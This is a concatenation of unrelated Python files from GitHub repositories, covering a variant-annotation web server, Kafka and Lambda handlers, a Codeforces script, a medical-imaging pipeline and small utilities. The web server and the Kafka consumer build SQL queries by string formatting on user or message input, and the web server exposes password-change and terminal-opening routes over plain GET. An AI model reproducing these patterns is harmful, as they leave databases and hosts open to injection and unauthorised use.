await cursor.execute('update users set passwordhash="{}" where email="{}"'.format(temppasswordhash, email))
await db.commit()
await cursor.close()
await db.close()
return web.json_response({'success': True, 'msg': temppassword})
else:
await cursor.close()
await db.close()
return web.json_response({'success': False, 'msg': 'Wrong answer'})
async def change_password (request):
'''
session = await get_session(request)
email = session['username']
'''
email = 'default'
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
queries = request.rel_url.query
oldpassword = queries['oldpassword']
newpassword = queries['newpassword']
m = hashlib.sha256()
m.update(oldpassword.encode('utf-16be'))
oldpasswordhash = m.hexdigest()
await cursor.execute('select * from users where email="{}" and passwordhash="{}"'.format(email, oldpasswordhash))
r = await cursor.fetchone()
if r is None:
await cursor.close()
await db.close()
return web.json_response('User authentication failed.')
else:
m = hashlib.sha256()
m.update(newpassword.encode('utf-16be'))
newpasswordhash = m.hexdigest()
await cursor.execute('update users set passwordhash="{}" where email="{}"'.format(newpasswordhash, email))
await db.commit()
await cursor.close()
await db.close()
return web.json_response('success')
async def check_logged (request):
'''
session = await get_session(request)
username = session['username']
logged = session['logged']
'''
username = 'default'
logged = False
if logged:
return web.json_response({'logged': True, 'email': username})
else:
return web.json_response({'logged': False, 'email': ''})
async def logout (request):
'''
session = await new_session(request)
session['username'] = None
'''
return web.json_response('success')
'''
username = session['username']
root_jobs_dir = au.get_jobs_dir()
admin_db_path = os.path.join(root_jobs_dir, 'admin.sqlite')
db = await aiosqlite3.connect(admin_db_path)
cursor = await db.cursor()
await cursor.execute('select * from users where email="{}" and passwordhash="{}"'.format(username, passwordhash))
r = await cursor.fetchone()
if r is not None:
response = 'success'
session['username'] = username
session['logged'] = True
await create_user_dir(request, username)
else:
response = 'fail'
await cursor.close()
await db.close()
return web.json_response(response)
'''
def get_servermode (request):
servermode=False
return web.json_response({'servermode': servermode})
async def get_package_versions(request):
cur_ver = au.get_current_package_version()
lat_ver = au.get_latest_package_version()
update = LooseVersion(lat_ver) > LooseVersion(cur_ver)
d = {
'current': cur_ver,
'latest': lat_ver,
'update': update
}
return web.json_response(d)
def open_terminal (request):
filedir = os.path.dirname(os.path.abspath(__file__))
python_dir = os.path.dirname(sys.executable)
p = sys.platform
if p.startswith('win'):
cmd = {'cmd': ['start', 'cmd'], 'shell': True}
elif p.startswith('darwin'):
cmd = {'cmd': '''
osascript -e 'tell app "Terminal"
do script "export PATH=''' + python_dir + ''':$PATH"
do script "echo Welcome to OpenCRAVAT" in window 1
end tell'
''', 'shell': True}
elif p.startswith('linux'):
p2 = platform.platform()
if p2.startswith('Linux') and 'Microsoft' in p2:
cmd = {'cmd': ['ubuntu1804.exe'], 'shell': True}
else:
return
else:
return
subprocess.call(cmd['cmd'], shell=cmd['shell'])
response = 'done'
return web.json_response(response)
filerouter = FileRouter()
VIEW_PROCESS = None
routes = []
routes.append(['POST','/submit/submit',submit])
routes.append(['GET','/submit/annotators',get_annotators])
routes.append(['GET','/submit/jobs',get_all_jobs])
routes.append(['GET','/submit/jobs/{job_id}',view_job])
routes.append(['DELETE','/submit/jobs/{job_id}',delete_job])
routes.append(['GET','/submit/jobs/{job_id}/db', download_db])
routes.append(['GET','/submit/reports',get_report_types])
routes.append(['POST','/submit/jobs/{job_id}/reports/{report_type}',generate_report])
routes.append(['GET','/submit/jobs/{job_id}/reports/{report_type}',download_report])
routes.append(['GET','/submit/jobs/{job_id}/log',get_job_log])
routes.append(['GET', '/submit/getjobsdir', get_jobs_dir])
routes.append(['GET', '/submit/setjobsdir', set_jobs_dir])
routes.append(['GET', '/submit/getsystemconfinfo', get_system_conf_info])
routes.append(['GET', '/submit/updatesystemconf', update_system_conf])
routes.append(['GET', '/submit/resetsystemconf', reset_system_conf])
routes.append(['GET', '/submit/login', login])
routes.append(['GET', '/submit/servermode', get_servermode])
routes.append(['GET', '/submit/signup', signup])
routes.append(['GET', '/submit/logout', logout])
routes.append(['GET', '/submit/passwordquestion', get_password_question])
routes.append(['GET', '/submit/passwordanswer', check_password_answer])
routes.append(['GET', '/submit/changepassword', change_password])
routes.append(['GET', '/submit/checklogged', check_logged])
routes.append(['GET', '/submit/packageversions', get_package_versions])
routes.append(['GET', '/submit/openterminal', open_terminal])
if __name__ == '__main__':
app = web.Application()
for route in routes:
method, path, func_name = route
app.router.add_route(method, path, func_name)
web.run_app(app, port=8060)
| pevs/open-cravat | cravat/websubmit/websubmit.py | websubmit.py | py | 26,894 | python | en | code | null | github-code | 1 | [
{
"api_name": "os.path.dirname",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "cravat.admin_util.get_jobs_dir",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "cravat.ad... |
935555272 | import functools
import logging
import time
def validate_command(command):
def actual_decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if len(args) < 2:
logging.debug(f"{func.__name__} Error: not enough arguments")
return
io_line = args[1]
if io_line[0] != command:
logging.debug(
f"{func.__name__} Error: Got {io_line[0]}, expecting command {command}"
)
return
return func(*args, **kwargs)
return wrapper
return actual_decorator
def log_command(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if len(args) < 2 and len(args[1]) < 0:
logging.debug(f"{func.__name__} Error: not enough arguments")
return
command_letter = args[1][0]
logging.debug(f"\n -------> {','.join(args[1])}")
before = time.time()
command = func(*args, **kwargs)
after = time.time()
time_taken = round((after - before) * 1000, 2)
# In CSV Format
logging.info(f"{command_letter},{time_taken}")
return command
return wrapper
| CS4224-Claps/project | cockroachdb/utils/decorators.py | decorators.py | py | 1,236 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "logging.debug",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "functools.wraps",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "logging.debug",
"line_... |
24758047234 | import boto3
import logging
import os
import json
dynamodb_client = boto3.client('dynamodb', region_name="us-east-1")
sns_client = boto3.client('sns', region_name="us-east-1")
CUSTOMERS_TABLE_NAME = os.getenv('CUSTOMERS_TABLE', "functions_table")
SNS_TOPIC_ARN_FUNCTION_MODIFIED = "function_modified"
with_sns_msg = True
def notify_new_customer(key):
message = {
'newCustomer': key,
}
sns_client.publish(TopicArn=SNS_TOPIC_ARN_FUNCTION_MODIFIED, Message=json.dumps(message))
logging.info('sns message published')
def lambda_handler(event, context):
# This lambda will handle new user files uploaded to the customer s3 bucket
for record in event['Records']:
bucket = record['s3']['bucket']['name']
key = record['s3']['object']['key']
logging.debug("Got a new customer file")
dynamodb_client.put_item(TableName=CUSTOMERS_TABLE_NAME, Item={"key": key})
if with_sns_msg:
notify_new_customer(key)
return event
# if __name__ == "__main__":
# lambda_namdler({})
| dome9/protego-examples | proact/inputs/python_new_file_handler/python_new_file_handler.py | python_new_file_handler.py | py | 1,058 | python | en | code | 4 | github-code | 1 | [
{
"api_name": "boto3.client",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "boto3.client",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.getenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 19,
... |
17890730091 | import sys
import os
from rich.pretty import pprint
from urllib.parse import quote_plus
from rich.table import Table
from rich.console import Console
from rich.prompt import IntPrompt, Prompt, Confirm
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/../..")
from lib.submissions import get_submissions, get_submissions_for_contest
from lib.contests import get_contest_map, get_contest_number
from lib.problems import get_problems
# printer.PRINT=set_status
def get_table():
table=Table(
title="List of codeforces problems",
title_style="on_default",
show_lines=True,
highlight=True,
expand=True,
)
table.add_column("contest name", ratio=4)
table.add_column("contest id", ratio=1)
table.add_column("problem name", ratio=3)
table.add_column("problem id", ratio=1)
table.add_column("problem rating", ratio=1)
table.add_column("url", ratio=7)
return table
def add_row(table, data, contest_mp):
cid = None
if "contestId" in data: cid = data["contestId"]
cname = None
if cid is not None: cname = contest_mp[cid]["name"]
pname = data["name"]
pid = data["index"]
rating = None
if "rating" in data: rating = data["rating"]
url = None
if cid is not None:
url = "https://codeforces.com/contest/{}/problem/{}".format(
quote_plus(str(cid)),
quote_plus(pid),
)
if cname is None: cname = ""
if cid is None: cid = ""
if pname is None: pname = ""
if pid is None: pid = ""
if rating is None: rating = ""
if url is None: url = ""
table.add_row(cname, str(cid), pname, pid, str(rating), url)
def get_unsolved_problems_from_participated_contests(handle):
submissions = get_submissions(handle)
used_contest_ids = set()
contest_mp = get_contest_map()
solved_problems = set()
for submission in submissions:
is_ac = submission["verdict"] == "OK"
# handle div1 and div2 having the same problems but different ids
if "contestId" not in submission: continue
cid = submission["contestId"]
if is_ac:
full_problem_name = str(cid) + submission["problem"]["name"]
solved_problems.add(full_problem_name)
used_contest_ids.add(cid)
if cid not in contest_mp: continue
cnum = get_contest_number(contest_mp[cid]["name"])
if cid - 1 in contest_mp:
num = get_contest_number(contest_mp[cid - 1]["name"])
if num is not None and cnum == num:
used_contest_ids.add(cid - 1)
if is_ac:
full_problem_name = str(cid - 1) + submission["problem"]["name"]
solved_problems.add(full_problem_name)
if cid + 1 in contest_mp:
num = get_contest_number(contest_mp[cid + 1]["name"])
if num is not None and cnum == num:
used_contest_ids.add(cid + 1)
if is_ac:
full_problem_name = str(cid + 1) + submission["problem"]["name"]
solved_problems.add(full_problem_name)
all_problems = get_problems()
problems = []
for problem in all_problems:
is_problem_ok = False
if "contestId" not in problem:
is_problem_ok = True
else:
cid = problem["contestId"]
full_problem_name = str(cid) + problem["name"]
if cid in used_contest_ids and full_problem_name not in solved_problems:
is_problem_ok = True
if is_problem_ok:
problems.append(problem)
problems = problems[::-1] # reverse
return problems
def filter_by_rating(problems, rmin, rmax):
def filter_problem(problem):
rating = None
if "rating" in problem: rating = problem["rating"]
return rating is not None and rmin <= rating <= rmax
return filter(filter_problem, problems)
def main():
handle = Prompt.ask("CodeForces handle")
should_filter_by_rating = Confirm.ask(
"Filter by rating",
default=False,
)
rmin = None
rmax = None
if should_filter_by_rating:
rmin = IntPrompt.ask(
"Minimum rating",
choices=list(map(str, range(0,10000))),
show_choices=False
)
rmax = IntPrompt.ask(
"Maximum rating",
choices=list(map(str, range(rmin,10000))),
show_choices=False
)
problems = get_unsolved_problems_from_participated_contests(handle)
if should_filter_by_rating:
problems = filter_by_rating(problems, rmin, rmax)
contest_mp = get_contest_map()
table = get_table()
for problem in problems:
add_row(table, problem, contest_mp)
console = Console()
console.print(table)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print()
sys.exit(1)
sys.exit(0)
| willthbill/cfscripts | src/scripts/UnsolvedContestProblems/main.py | main.py | py | 4,947 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_num... |
5393022370 | import PySimpleGUI as sg
from Utility import PathDefs
NAME_SIZE = 20
def name(name):
dots = NAME_SIZE - len(name) - 2
return sg.Text(name + ' ' + '•' * dots, size=(NAME_SIZE, 1), justification='r', pad=(0, 0), font='Courier 10')
def create_rows(max_cost, max_mass, max_disp, max_time, cost_coef, mass_coef, disp_coef, time_coef, response, dataMaxes):
final_bids = []
for bid in response:
if (bid["cost"] > max_cost) or (bid["time"] > max_time) or (bid["mass"] > max_mass) or bid["disp"] > max_disp:
continue
score = generate_score(cost_coef, mass_coef, disp_coef, time_coef, bid["cost"],
bid["time"], bid["mass"], bid["disp"], dataMaxes)
layout_bars = [[name('Cost'), sg.ProgressBar(dataMaxes["cost"], orientation='h', s=(10, 20),
k=('-CBAR-'+bid["link"]),
bar_color=(getParamBarColor(cost_coef), "grey"))],
[name('Lead Time'), sg.ProgressBar(dataMaxes["time"], orientation='h', s=(10, 20),
k=('-TBAR-'+bid["link"]),
bar_color=(getParamBarColor(time_coef), "grey"))],
[name('Mass'), sg.ProgressBar(dataMaxes["mass"], orientation='h', s=(10, 20),
k=('-MBAR-'+bid["link"]),
bar_color=(getParamBarColor(mass_coef), "grey"))],
[name('Max Displacement'), sg.ProgressBar(dataMaxes["disp"], orientation='h', s=(10, 20),
k=('-DBAR-'+bid["link"]),
bar_color=(getParamBarColor(disp_coef), "grey"))]]
layout_buttons = [
[sg.Col([[sg.Button('Design File', key=("designf"+bid["link"]), enable_events=True),
sg.Button('Supplier Info', key=("supplier"+bid["link"]), enable_events=True)]])],
[sg.Col([[sg.Button('Process Plan', key=("pplan"+bid["link"]), enable_events=True),
sg.Button('Initiate Contract', button_color='green')]])]
]
score_color, hex = getScoreColor(float(score))
layout_c = [sg.Image(getImagePath(bid["link"], False)),
sg.Pane([sg.Col([[sg.T('Score' + '\n' + str(round(score, 2)), justification='c',
background_color=score_color)]], background_color=score_color)],
background_color=score_color),
sg.Col(layout_bars), sg.Col(layout_buttons)]
content = [sg.Frame(bid["link"], [[sg.Col([layout_c], p=20, vertical_alignment='t')]], border_width=3)]
bid["score"] = score
bid["content"] = content
bid["color"] = hex
bid["pic"] = getImagePath(bid["link"], True)
final_bids.append(bid)
return final_bids
def generate_score(cost_coef, mass_coef, disp_coef,
time_coef, cost, time, mass, displacement, dataMaxes):
return 100*(cost_coef * (dataMaxes["cost"]-cost)/dataMaxes["cost"]
+ mass_coef * (dataMaxes["mass"]-mass)/dataMaxes["mass"]
+ time_coef * (dataMaxes["time"]-time)/dataMaxes["time"]
+ disp_coef * (dataMaxes["disp"]-displacement)/dataMaxes["disp"])
def sortRows(final_bids, value):
reverse_val = False
if value == "score":
reverse_val = True
rows = sorted(final_bids, key=lambda d: d[value], reverse=reverse_val)
return [row["content"] for row in rows]
def getScoreColor(score):
if score >= 90:
return "dark green", '#006400'
if score >= 80:
return "lime green", '#32CD32'
if score >= 70:
return "OliveDrab1", '#C0FF3E'
if score >= 60:
return"yellow", '#FFFF00'
if score >= 50:
return "tan1", '#FFA54F'
if score >= 40:
return "orange", '#FFA500'
if score >= 30:
return "orange red", '#FF4500'
if score >= 20:
return "red", '#FF0000'
if score >= 10:
return "red4", '#8B0000'
return "maroon", '#B03060'
def getParamBarColor(coef):
if coef >= 0.9:
return 'midnight blue'
if coef >= 0.8:
return 'navy'
if coef >= 0.7:
return 'medium blue'
if coef >= 0.6:
return 'blue2'
if coef >= 0.5:
return 'blue'
if coef >= 0.4:
return 'dodger blue'
if coef >= 0.3:
return 'DeepSkyBlue3'
if coef >= 0.2:
return 'deep sky blue'
if coef >= 0.1:
return 'SkyBlue1'
return 'LightSkyBlue1'
def getImagePath(link, isGraphImage):
# path = "C:\\Users\\akimmel\\PycharmProjects\\LMCOgui\\Utility\\Data\\executable-win\\executable-win\\data\\burak-initial-dataset-v4-zbr\\Generative_Design_Data\\"
suffix = "part75x75.png" if isGraphImage else "part110x110.png"
return str(PathDefs.design_path / str(link) / suffix)
| anikimmel/LMCOgui | Utility/row_utilities.py | row_utilities.py | py | 5,099 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "PySimpleGUI.Text",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.ProgressBar",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "PySimpleGUI.ProgressBar",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "PySim... |
39117095073 | """
CS235 Homework 3
Aleksander Skjoelsvik
"""
from math import floor
from fractions import gcd
#Task 1:
"""
a:
4x = 2 (mod 11)
4x = 24 (mod 11)
x = 6 + 11Z
b:
x = 3 (mod 7)
x = 1 (mod 5)
x = 31 + 35Z
c:
x = 2 (mod p)
x = 4 (mod q)
x = 2(q * q^(-1)) + 4(p * p^(-1)) (mod (p*q))
= 2 * q * 3 + 4 * p * 5
= 6q + 20p (mod pq)
d:
x = 4 (mod 5)
x = 3 (mod 14)
x = 59 + 70Z
(range x E Z/70Z)
"""
#Task 2:
def invPrime(a, p):
if a == 0:
return None
else:
return pow(a, p-2, p)
def egcd(a, b):
(x, s, y, t) = (0, 1, 1, 0)
while b != 0:
k = a // b
(a, b) = (b, a % b)
(x, s, y, t) = (s - k*x, x, t - k*y, y)
return (s, t)
def inv(a, m):
if gcd(a, m) == 1:
(s, t) = egcd(a, m)
return s % m
else:
return None
#Task 3:
def solveOne(c, a, m):
if gcd(c, m) == 1:
return a * inv(c, m) % m
else:
return None
def solveTwo(e1, e2):
(c, a, m) = e1
(d, b, n) = e2
x1 = solveOne(c, a, m)
x2 = solveOne(d, b, n)
(u, v) = egcd(m, n)
part1 = (m * u) * x2
part2 = (n * v) * x1
if ((x1 == None) or (x1 == None) or (gcd(n, m) != 1)):
return None
else:
return (part1 + part2) % (m * n)
def solveAll(es):
while len(es) > 1:
(c, a, m) = es.pop()
(d, b, n) = es.pop()
result = solveTwo((c, a, m), (d, b, n))
es.append((1, result, m*n))
(c, a, m) = es.pop()
return a
#Task 4:
""" A:
def sumOfPowers(nes, ps):
answers = []
for p in ps:
answers += [(1, sum([pow(n, e, p) for (n, e) in nes]), p)]
return solveAll(answers)
B: """
def sumOfPowers(nes, ps):
answers = []
for p in ps:
answers += [(1, sum([pow(n, e % (p-1), p) for (n, e) in nes]), p)]
return solveAll(answers)
| alekplay/schoolwork | CS235/hw3.py | hw3.py | py | 1,964 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "fractions.gcd",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "fractions.gcd",
"line_number": 76,
"usage_type": "call"
}
] |
74069745633 | ### FUNCTIONS
import skimage
import numpy as np
from math import sqrt
from skimage.feature import blob_dog, blob_log
from PIL import Image
import torch
from torchvision import transforms
import matplotlib.pyplot as plt
import matplotlib
import cv2
import os
### 1 GET DISTANCE
def crop_x(image, x1=100,x2=250, y1=38,y2=48):
"""
Return the cropped image at the x1, x2, y1, y2 coordinates
"""
return image[y1:y2 , x1:x2, :]
def crop_x2D(image, x1=100,x2=250, y1=38,y2=48):
"""
Return the cropped image at the x1, x2, y1, y2 coordinates
"""
return image[y1:y2 , x1:x2]
def find_points(image, laplacian=True):
image_gray = skimage.color.rgb2gray(image)
if laplacian == True:
blobs_log = blob_log(image_gray, max_sigma=30, num_sigma=10, threshold=.1)
blobs_log[:, 2] = blobs_log[:, 2] * sqrt(2)
return blobs_log
else:
blobs_dog = blob_dog(image_gray, max_sigma=30, threshold=.1)
blobs_dog[:, 2] = blobs_dog[:, 2] * sqrt(2)
return blobs_dog
def crop_image(img):
if len(np.shape(img)) == 3:
img1 = crop_x(img,100,300,0,60)
else:
img1 = crop_x2D(img,100,300,0,60)
points = find_points(img1,laplacian=False)
for p in points:
if p[2] <1.5:
x = int(p[1])
y = int(p[0])
break
try:
if y <3:
y=3
except:
img = second_crop(img)
return img
if x<49:
x=50
img = crop_x(img, x1=(x-10),x2=(x+130),y1=(y-2),y2=(y+2))
return img
def second_crop(img):
if len(np.shape(img)) == 3:
img1 = crop_x(img,100,300,0,60)
else:
img1 = crop_x2D(img,100,300,0,60)
points = find_points(img1,laplacian=True)
for p in points:
if p[2] <1.5:
x = int(p[1])
y = int(p[0])
break
try:
if y <3:
y=3
except UnboundLocalError:
img = crop_x(img,y1=0)
return img
if x<49:
x=50
img = crop_x(img, x1=(x-10),x2=(x+130),y1=(y-2),y2=(y+2))
return img
def get_distance_x(points):
all =[]
for p in points:
if p[2] < 1.5:
all.append(p[1])
all =np.sort(all)
distances = [abs(all[i] - all[i+1]) for i in range(len(all)-1)]
return np.mean(distances)
### 2 PREPROCESSING
def preprocess_img(file):
"""
Crop the images to 375x375 without considering where is the kidney.
It read the image file and the matlab files where the masks where saved
features:
- file: list of name files
- s-lesions: dict with the indx and the sum of the lesions each kidney has
- poly: list of names with the poly mask
"""
im = Image.open(file) #IMAGE
im_dim= np.shape(im)[:2] #we get the dimension of the image (and the masks)
min_s = 375
#getting the number of pixels we need to remove
h = im_dim[0] - min_s
w = im_dim[1] - min_s
left = int(w/2); right = min_s+int(w/2)
top = int(h/4); bottom = min_s+int(h/4)
######################################## CROP AND RETURN ####################################################
#IMAGE
im2 = im.crop((left, top, right, bottom))
return im2
### 3 CLASIFICATION
def probs_to_prediction(probs, threshold):
pred=[]
for x in probs[:,1]: #check the probabilities of the class 1
if x>threshold: #[0.3, 0.7] --> 0.7 > 0.6 (th)
pred.append(1) #pathological
else:
pred.append(0) #health
return pred
def predictionRESNET(model, image_test, threshold = 0.5):
"""
model: model to be used
"""
image_test = preprocess_for_model(image_test)
with torch.no_grad():
model.eval()
image_test = image_test.reshape((1,3,375,375))
outputs_t = model(image_test)
## PREDICTIONS
prob_t = torch.nn.functional.softmax(outputs_t, dim=1)
pred_t = probs_to_prediction(prob_t, threshold)
return pred_t[0]
def preprocess_for_model(img, type_model = 1):
"""
type_model = 1 (classification) 2 (segmentation)
"""
data_transforms = transforms.Compose([transforms.ToTensor()])
if type_model == 2:
# new_img = np.moveaxis(new_img, 2,0)
# return DataLoader(torch.tensor(new_img)).dataset[0]
return data_transforms(img)
else:
new_img = np.array(img)
return torch.tensor(new_img, dtype=torch.float)
### 4 SEGMENTATION
def predictionDEEPLABV(model, image_test, threshold = 0.6, save=False):
"""
model: model to be used
"""
image_test = preprocess_for_model(image_test, 2)
with torch.no_grad():
model.eval()
mask = model(image_test.unsqueeze_(0))['out']
mask = mask.detach().numpy()
new_mask = (mask>= threshold) *1
if save:
plt.imshow(new_mask.reshape((375, 375,1)))
plt.savefig('test.jpg')
return new_mask
### 5 AREA AND THICKNESS
def getArea_Thickness_Parenchyma(mask: np.array, px_cm:float):
file = 'test.png'
mask = mask.reshape((375,375))
matplotlib.image.imsave(file , mask) #better not in black and white so we can check better the ellipse when plotting
image = cv2.imread(file, 0)
os.remove(file)
ret,thresh = cv2.threshold(image,150,255,0)
contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
c_max = 0
for c in range(len(contours)):
if len(contours[c]) > c_max:
c_max = len(contours[c])
cnt = contours[c]
ellipse_old = cv2.fitEllipse(cnt)
### AREA ________________________________________________________
#change values of axis lengh
ellipse = list(ellipse_old)
ellipse[1] = [0, 500] #makes the mayor axis bigger
ellipse_img = cv2.ellipse(image,ellipse, (0,0,255), 1)
for j in range(ellipse_img.shape[1]):
idx_min = np.argmin(ellipse_img[:, j])
#once we have the idx, we can transform all into zeros (below)
mask[idx_min:, j] = 0
pixels_paren = np.sum(mask==1)
area = round(pixels_paren/px_cm, 2)
### THICKNESS_____________________________________________________
ellipse = list(ellipse_old)
ellipse[1] = [500, 0] #makes the minor axis bigger
black_img = np.zeros((375, 375), dtype = np.uint8)
ellipse_img = cv2.ellipse(black_img,ellipse, (255,255,255), 1) #to draw only the ellipse
ones_img = mask*ellipse_img
pixels_paren = np.sum(ones_img==255)
thick = round(pixels_paren/px_cm, 2)
return [area*2, thick]
### 6 AREA AND THICKNESS KIDNEY
def getArea_Thickness_Kidney(mask: np.array, px_cm:float):
file = 'test.png'
mask = mask.reshape((375,375))
matplotlib.image.imsave(file , mask) #better not in black and white so we can check better the ellipse when plotting
img = cv2.imread(file, 0)
os.remove(file)
ret, thresh = cv2.threshold(img, 150, 255, 0)
contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
ellipse_contour = max(contours, key=cv2.contourArea)
ellipse = cv2.fitEllipse(ellipse_contour)
(x, y), (minor_axis, major_axis), angle = ellipse
## AREA
area = round(np.sum(mask==1)/px_cm, 2)
## AXIS LENGTH
mayor = round(major_axis/px_cm, 2)
minor = round(minor_axis/px_cm, 2)
return [area, mayor, minor]
| AlmudenaBravoC/CAD-ultrasound-renal-diagnosis | TestImage/allProcess.py | allProcess.py | py | 6,977 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "skimage.color.rgb2gray",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "skimage.color",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "skimage.feature.blob_log",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "ma... |
30558238775 | import psycopg2
import json
from kafka import KafkaConsumer
class Consumer:
kafka_server = None
consumer = None
kafka_topic = None
db_config = None
db_conn = None
def __init__(self):
config = self.load_config()
self.kafka_server = config['credentials']['kafka']['uri']
self.kafka_topic = config['credentials']['kafka']['topic']
self.db_config = config['credentials']['db']
self.init_consumer()
self.db_connect()
self.poll_from_topic()
def load_config(self):
"""
Load configuration file
"""
with open('config.json') as json_file:
config = json.load(json_file)
return config
def init_consumer(self):
"""
Initialize consumer and connect to the Kafka Server
"""
try:
consumer = KafkaConsumer (
self.kafka_topic,
bootstrap_servers=self.kafka_server,
security_protocol="SSL",
ssl_cafile="keys/ca.pem",
ssl_certfile="keys/service.cert",
ssl_keyfile="keys/service.key",
value_deserializer=lambda x: json.loads(x.decode('utf-8'))
)
except Exception as ex:
raise Exception("Unable to connect to Kafka from consumer")
self.consumer = consumer
def db_connect(self):
"""
Connect to the database
"""
# db connect
# https://www.postgresqltutorial.com/postgresql-python/connect/
try:
conn = psycopg2.connect(
host=self.db_config['host'],
database=self.db_config['db_name'],
port=self.db_config['port'],
user=self.db_config['user'],
password=self.db_config['password']
)
conn.autocommit = True
self.db_conn = conn
print("Connected to the Database")
except Exception as ex:
raise Exception("Unable to connect to database")
def save_message(self, msg):
"""
Save message from the poll
"""
try:
cur = self.db_conn.cursor()
cur.execute(
"insert into website_availability(website, status_code, response_time, regex_found) values('{}', {}, {}, {})".format(
msg.value["target"],
msg.value["status_code"],
msg.value["response_time"],
msg.value["regex"]
)
)
except Exception as ex:
print(ex)
def poll_from_topic(self):
"""
Retrive message from topic
"""
for msg in self.consumer:
self.save_message(msg)
print("Topic Name=%s,Message=%s"%(msg.topic,msg.value))
if __name__ == "__main__":
c = Consumer() | vladimir-kirillovskiy/website-monitoring | consumer.py | consumer.py | py | 2,947 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "json.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "kafka.KafkaConsumer",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "psycopg2.connect",
"line... |
42448765073 | import argparse
import glob
import json
import os
import sys
MIN_PYTHON = (3, 0)
if sys.version_info < MIN_PYTHON:
sys.exit("Python {}.{} or later is required.\n".format(*MIN_PYTHON))
parser = argparse.ArgumentParser()
parser.add_argument("input", help="input directory with files to annotate")
parser.add_argument("output", help="output directory to put packed files")
parser.add_argument("min_tokens", help="minimum number of tokens per file", type=int)
args = parser.parse_args()
if not os.path.isdir(args.input):
sys.exit("Error: {} does not exist".format(args.input))
if not os.path.exists(args.output):
os.makedirs(args.output)
basename = None
lines = []
files = []
count = 1
metadata = {}
for filename in sorted(glob.glob(os.path.join(args.input, "*.txt"))):
# grab first 6 characters: IL6_NW
if basename is None:
basename = os.path.basename(filename)[0:6]
with open(filename, 'r') as ifp:
new_lines = [x for x in ifp]
# must have an empty line at end of file
if len(new_lines[-1].split('\t')) > 2:
new_lines.append('\n')
# remove tsv header after first file
if len(lines) > 0 and new_lines[0][0:5] == 'TOKEN':
del new_lines[0]
num_lines = len(new_lines)
# we don't write out header to annotation file
if len(lines) == 0:
num_lines -= 1
files.append({'filename': os.path.basename(filename), 'num_lines': num_lines})
lines.extend(new_lines)
if len(lines) > args.min_tokens:
out_filename = os.path.join(args.output, "{}_{:03d}.txt".format(basename, count))
with open(out_filename, 'w') as ofp:
ofp.writelines(lines)
metadata[os.path.basename(out_filename)] = files
lines = []
files = []
count += 1
with open(os.path.join(args.output, '.metadata'), 'w') as mfp:
json.dump(metadata, mfp)
| iscoe/dragonfly | scripts/pack.py | pack.py | py | 1,916 | python | en | code | 9 | github-code | 1 | [
{
"api_name": "sys.version_info",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "sys.exit",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.isdir",
... |
9249662097 | import gym
# Set learning parameters
LEARNING_RATE = .8
DISCOUNT_FACTOR = .95
NUM_EPISODES = 2000
def state_to_scalar(state):
state_scalar = state.reshape(state.shape[0] * state.shape[1] * state.shape[2], 1)
return state_scalar
env = gym.make('SpaceInvaders-v0')
env.reset()
print('env.observation_space.n', env.observation_space.n)
Q = np.zeros([env.observation_space.n,env.action_space.n])
for i_episode in range(NUM_EPISODES):
state = observation = env.reset()
state = state_to_scalar(state)
for t in range(1000):
print('state', state.shape)
env.render()
#print('env.action_space', env.action_space)
#action = env.action_space.sample()
action= np.argmax(Q[state,:] + np.random.randn(1,env.action_space.n)*(1./(i_episode+1)))
state_updated, reward, done, info = env.step(action)
state_updated = state_to_scalar(state_updated)
print('reward', reward)
state = state_updated
if done:
print("Episode finished after {} timesteps".format(t+1))
break
| raphaelgodro/open-ai-trains | space_invaders.py | space_invaders.py | py | 1,080 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gym.make",
"line_number": 16,
"usage_type": "call"
}
] |
23163444909 | import pyaudio
import math
import struct
# Wut is diz??
Threshold = 10
SHORT_NORMALIZE = (1.0/32768.0)
swidth = 2
chunk = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
f_name_directory = r'audiofiles'
class Listener:
@staticmethod
def rms(frame):
count = len(frame) / swidth
format = "%dh" % (count)
shorts = struct.unpack(format, frame)
sum_squares = 0.0
for sample in shorts:
